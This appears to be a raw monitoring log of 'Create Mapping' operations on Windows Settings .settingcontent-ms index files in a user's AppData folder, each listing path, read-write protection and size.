Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsEchoWordEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2144 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2160 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2160 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2144 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_IsReadHintsEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_SpeechPitch.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_SpeechSpeed.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_Narrator_SpeechVoices.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Accessibility_NotificationDuration.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Autoplay_IsEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_OverrideControl.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2112 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2112 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DataSense_ConfigureSetLimitButton.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_CountryRegion.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_IsAutomaticDSTAdjustEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_IsTimeSetAutomaticallyEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_IsTimeZoneSetAutomaticallyEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2112 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_Set.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_Set.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1968 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_SetFormats.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DateTime_TimezoneInfo.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Audio.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Browser.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Email.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Email.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Map.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Map.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Photos.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Video.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_DefaultApps_Video.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Devices_Pen_EnablePixie.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Devices_Pen_EnableRipple.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Devices_Pen_SetHandedness.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Device_Add.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Device_Add.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1968 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_AdvancedSettings.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_Brightness.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_Brightness.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_DPI_Override.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_DPI_Override.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_Duplicate.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_Duplicate.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_IdentifyDetectWireless.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_IsAutoBrightnessEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_IsRotationLocked.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_MainMonitor.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_MainMonitor.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_Monitors.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_Monitors.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_Orientation.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Display_Orientation.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Mouse_SetButtonConfiguration.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Mouse_SetScrollPage.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_CursorSpeed.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_EnableEdgeGesture.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_EnableTouchPad.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_EnableVisualFeedback.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_EnableVisualFeedbackPM.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_SetScrollDirection.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_TapAndDrag.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_TapsEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
